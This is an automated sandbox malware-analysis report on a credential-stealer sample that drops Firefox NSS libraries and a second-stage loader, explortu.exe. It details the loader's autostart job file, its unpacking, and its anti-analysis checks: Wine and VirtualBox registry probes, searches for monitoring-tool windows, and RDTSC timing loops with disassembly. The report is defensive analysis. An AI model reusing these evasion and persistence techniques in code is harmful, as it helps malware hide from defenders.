Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: tAa6xNsucX.exe Static file information: File size 2509824 > 1048576
Source: tAa6xNsucX.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x221800
Source: Binary string: mozglue.pdbP source: tAa6xNsucX.exe, 00000000.00000002.2340937251.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: tAa6xNsucX.exe, 00000000.00000002.2341269322.000000006C54F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: tAa6xNsucX.exe, 00000000.00000002.2340937251.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Unpacked PE file: 0.2.tAa6xNsucX.exe.bf0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Unpacked PE file: 7.2.HIIEBAFCBK.exe.c80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 9.2.explortu.exe.320000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 13.2.explortu.exe.320000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 14.2.explortu.exe.320000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 15.2.explortu.exe.320000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Unpacked PE file: 16.2.explortu.exe.320000.0.unpack :EW;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;loawlfyy:EW;wnkrvcvh:EW;.taggant:EW;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C37C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C37C410
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .data
PE file contains an invalid checksum
Source: tAa6xNsucX.exe Static PE information: real checksum: 0x0 should be: 0x2664c0
Source: explortu.exe.7.dr Static PE information: real checksum: 0x1df213 should be: 0x1e051d
Source: HIIEBAFCBK.exe.0.dr Static PE information: real checksum: 0x1df213 should be: 0x1e051d
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1df213 should be: 0x1e051d
PE file contains sections with non-standard names
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: tAa6xNsucX.exe Static PE information: section name:
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name:
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: .idata
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name:
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: loawlfyy
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: wnkrvcvh
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: .taggant
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: loawlfyy
Source: amadka[1].exe.0.dr Static PE information: section name: wnkrvcvh
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: explortu.exe.7.dr Static PE information: section name:
Source: explortu.exe.7.dr Static PE information: section name: .idata
Source: explortu.exe.7.dr Static PE information: section name:
Source: explortu.exe.7.dr Static PE information: section name: loawlfyy
Source: explortu.exe.7.dr Static PE information: section name: wnkrvcvh
Source: explortu.exe.7.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C34B536 push ecx; ret 0_2_6C34B549
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Code function: 9_2_0033CFEC push ecx; ret 9_2_0033CFFF
Source: tAa6xNsucX.exe Static PE information: section name: entropy: 7.994281744516605
Source: tAa6xNsucX.exe Static PE information: section name: entropy: 7.977734026363839
Source: tAa6xNsucX.exe Static PE information: section name: entropy: 7.947938524666875
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: entropy: 7.988071891877607
Source: HIIEBAFCBK.exe.0.dr Static PE information: section name: loawlfyy entropy: 7.953354575543591
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.988071891877607
Source: amadka[1].exe.0.dr Static PE information: section name: loawlfyy entropy: 7.953354575543591
Source: explortu.exe.7.dr Static PE information: section name: entropy: 7.988071891877607
Source: explortu.exe.7.dr Static PE information: section name: loawlfyy entropy: 7.953354575543591
Drops PE files
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe File created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\tAa6xNsucX.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe File created: C:\Windows\Tasks\explortu.job Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Code function: 0_2_6C3755F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C3755F0
Source: C:\Users\user\Desktop\tAa6xNsucX.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: CECF64 second address: CECF71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F47311907A6h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: CECF71 second address: CEC76E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F473118FE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d mov cl, ah 0x0000000f cmc 0x00000010 popad 0x00000011 push dword ptr [ebp+122D0631h] 0x00000017 cmc 0x00000018 call dword ptr [ebp+122D2363h] 0x0000001e pushad 0x0000001f jmp 00007F473118FE5Eh 0x00000024 or dword ptr [ebp+122D1FF0h], esi 0x0000002a xor eax, eax 0x0000002c add dword ptr [ebp+122D1FF0h], edx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 stc 0x00000037 mov dword ptr [ebp+122D3486h], eax 0x0000003d mov dword ptr [ebp+122D2EB7h], edi 0x00000043 mov esi, 0000003Ch 0x00000048 jbe 00007F473118FE5Ch 0x0000004e jnp 00007F473118FE57h 0x00000054 add esi, dword ptr [esp+24h] 0x00000058 or dword ptr [ebp+122D1FF0h], eax 0x0000005e lodsw 0x00000060 stc 0x00000061 add eax, dword ptr [esp+24h] 0x00000065 mov dword ptr [ebp+122D2EB7h], ebx 0x0000006b mov ebx, dword ptr [esp+24h] 0x0000006f mov dword ptr [ebp+122D1FF0h], edx 0x00000075 nop 0x00000076 pushad 0x00000077 push eax 0x00000078 push eax 0x00000079 push edx 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: CEC76E second address: CEC79F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F47311907ACh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F47311907B9h 0x00000013 push eax 0x00000014 push edx 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E68D7B second address: E68D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E69060 second address: E69065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E69065 second address: E69072 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jng 00007F473118FE56h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E69072 second address: E690A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F47311907B7h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F47311907B2h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E690A7 second address: E690AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E69217 second address: E6923F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F47311907B0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F47311907B2h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E693E3 second address: E693FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 pushad 0x00000007 jmp 00007F473118FE63h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B882 second address: E6B886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B93B second address: E6B941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B941 second address: E6B945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B945 second address: E6B953 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B953 second address: E6B95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B95A second address: E6B97D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F473118FE65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B97D second address: E6B981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6B981 second address: E6B987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6BB52 second address: E6BB5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F47311907A6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E6BB5D second address: E6BB62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E7E372 second address: E7E39F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47311907ADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F47311907B4h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8AEC5 second address: E8AEF9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F473118FE56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b je 00007F473118FEA8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F473118FE65h 0x00000018 jmp 00007F473118FE5Ch 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HIIEBAFCBK.exe RDTSC instruction interceptor: First address: E8AEF9 second address: E8AEFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
